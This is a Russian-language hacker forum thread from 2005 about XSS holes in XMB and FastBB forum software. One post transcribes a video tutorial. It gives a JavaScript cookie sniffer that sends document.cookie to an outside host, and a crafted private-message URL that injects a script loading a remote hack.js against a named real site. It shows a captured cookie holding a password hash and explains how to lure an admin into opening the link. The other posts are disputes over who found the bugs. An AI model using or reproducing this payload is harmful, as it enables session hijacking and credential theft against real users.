HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Video.Antichat > Комментарии к видео
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в форумах XMB и FastBB
  #1  
Старый 16.11.2005, 18:03
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
С нами: 12607586

Репутация: 0


По умолчанию XSS в форумах XMB и FastBB



XSS в форумах XMB.
Дата добавления: 15:54 16.11.2005
Автор: XgluiR[[NO]]
Категория: Другое


Скачать: xmbxss.rar [0.99 Мб]



XSS в форумах FastBB.
Дата добавления: 15:51 16.11.2005
Автор: Ван[[NO]]
Категория: Другое


Скачать: fastbbxss.rar [0.56 Мб]
 
Ответить с цитированием

  #2  
Старый 17.11.2005, 06:13
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


По умолчанию

Выдрано из архива с видео
Цитата:
Привет я XgLuir

Сейчас я покажу XSS в форумах XMB

идем на форум а потом в отправку личных сообщений

http://www.karakelle.ru/forum/u2u.php?action=send - тут форма для отпраки!

Дыра находиться в форме для получателей из-за плохой фильтрации

Как видите пашет внедрим снифир

Для этого создадим js файл с кодом для сниффера

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

он у меня уже есть

http://www.fath.jino-net.ru/hack.js

Внедрим

REFERER=http://www.karakelle.ru/forum/u2u.php?action=send&username=<script>alert('xss')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>
QUERY=xmblva=1131740719; xmbuser=Зайка; xmbpw=202cb962ac59075b964b07152d234b70; xmblvb=1131737548
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)



Ну вот получили
xmbpw=202cb962ac59075b964b07152d234b70 - md5 hash

Но наверно появился вапрос а как у админы стырить ?

Отправляем админу сформированый линк он открывает и снифф записывает кукисы

http://www.karakelle.ru/forum/u2u.php?action=send&username=<script%20src=http://www.fath.jino-net.ru/hack.js></script>

Но лучше ссылку за кодировать

Вот и все
 
Ответить с цитированием

  #3  
Старый 17.11.2005, 11:23
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

мда, извращение записывать видео, когда это мона описать в жва предложения.
Otaku спасибо.
 
Ответить с цитированием

  #4  
Старый 19.11.2005, 14:46
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию

На fastbb багу уже прикрыли.
 
Ответить с цитированием

  #5  
Старый 19.11.2005, 15:59
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

Цитата:
На fastbb багу уже прикрыли.
Баг сам нашел?? вроде wj че-та находил да?
 
Ответить с цитированием

  #6  
Старый 19.11.2005, 16:35
PSalm69
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
С нами: 10963106

Репутация: 1060


По умолчанию

Цитата:
Сообщение от qBiN  
Баг сам нашел?? вроде wj че-та находил да?
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
__________________
ICQ 9731923

 
Ответить с цитированием

  #7  
Старый 19.11.2005, 23:33
Бафун
Banned
Регистрация: 19.11.2005
Сообщений: 17
С нами: 10775846

Репутация: 1
По умолчанию

Цитата:
Сообщение от PSalm69  
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
Интересно, как понять эти и другие баги нашёл Задохлик? Что, все баги которые Я нашёл, Задохлик нашёл первый? или тебя понимать, что чтобы Я не находил, Задохлик уже это нашёл? Если да, то что? Это раз, два, Задохлик не показывает мне свою работу, по этому надежды что то скопировать у меня у него - нету как таковой.

Теперь, люди на форуме просили взломать фастбб потому что никто его не мог взломать. Если Задохлик, а кажись первым был не Задохлик а Джаз, ну так вот, если Джаз не захотел выложить коды для фастбб, или тот который нашёл, то это уже их проблемы. Я их выложил чисто чтобы похвастатся что Я Гений.


А вообще, Задохлик мало что понимает в ХSS, найти багу, с трудом может. Единственные люди на античате которые шарют в ХSS, так это White Jordan, Algol, zheleza, и zFailure которого терь нет. Задохлика эрия, это PHP including, так что не верю, что он мог в фастбб найти спаренные теги.
 
Ответить с цитированием

  #8  
Старый 20.11.2005, 13:30
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию

White Jordna, быстро твое мнение о людях меняется =D Ну ладно, думай как знаешь, я не буду писать что умеешь и не умеешь ты, т.к. каждому, кто в теме это и так уже понятно. И вообще меряться письками с кем-либо я не умею и не хочу.
 
Ответить с цитированием

  #9  
Старый 20.11.2005, 21:42
Бафун
Banned
Регистрация: 19.11.2005
Сообщений: 17
С нами: 10775846

Репутация: 1
По умолчанию

Цитата:
Сообщение от Zadoxlik  
White Jordna, быстро твое мнение о людях меняется =D Ну ладно, думай как знаешь, я не буду писать что умеешь и не умеешь ты, т.к. каждому, кто в теме это и так уже понятно. И вообще меряться письками с кем-либо я не умею и не хочу.
У меня поменялось мнение о твоей знатности XSS, когда Я прочёл твои старые посты

А так, Я знаю по твоему видео, что ты шаришь по php including да и всё...

Насчёт меня. Я просмотрел ВСЕ видео античата, и когда выходит новое видео, Я его опять смотрю. И к чему Я это? Да к тому, что Я умею всё. Просто лучше всегдо, делаю атаки ХSS, так как это мне только и интересно. Баги php/including, SQL injection и т.д. они или есть, или их нет. Некоторые люди, могут их заставлять быть....как Я в XSS это прикраснно делаю. Баги XSS может и не быть, но Я заставлю чтобы она была и не важно на каком форуме или мыле! Вот такого уровня в других фазах не спорю, Я ещё не достиг. Но если бага уже найденна, или её легко найти, то провести атаку мне ничего не стоит....

Да Я и проводил и php including и SQL injection и многие другие разновидности атак, просто нашёл что к XSS у меня больше чем к другим, есть интерес. А вот такого уровня где человек заставляет XSS существовать когда её в памини нету и быть не может, вот такого уровня у тебя ещё нет.

Ты можешь найти что то basic как и все, а более advanced, это уже не к тебе идти.

Последний раз редактировалось Бафун; 21.11.2005 в 00:25..
 
Ответить с цитированием

  #10  
Старый 19.11.2005, 20:08
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию

Да, я взял багу которую выложил на форум wj, но она не работала-куки не подставлялись я просто капельку додумал-присылать переменные, во всем мне многие помогали, всем респект. Видео я сначала снимать и не думал, но потом подкинули идею-решил снять.
Насчёт сейчашней ситуации на fastbb-сейчас там что-то меняют, тег img не работает вообще. Обещают(посмотрел на a.fastbb.ru) что скоро закончат.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
форумы - fastBB?! - оценка и методы... ][s0u1 Уязвимости CMS / форумов 12 23.04.2005 08:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.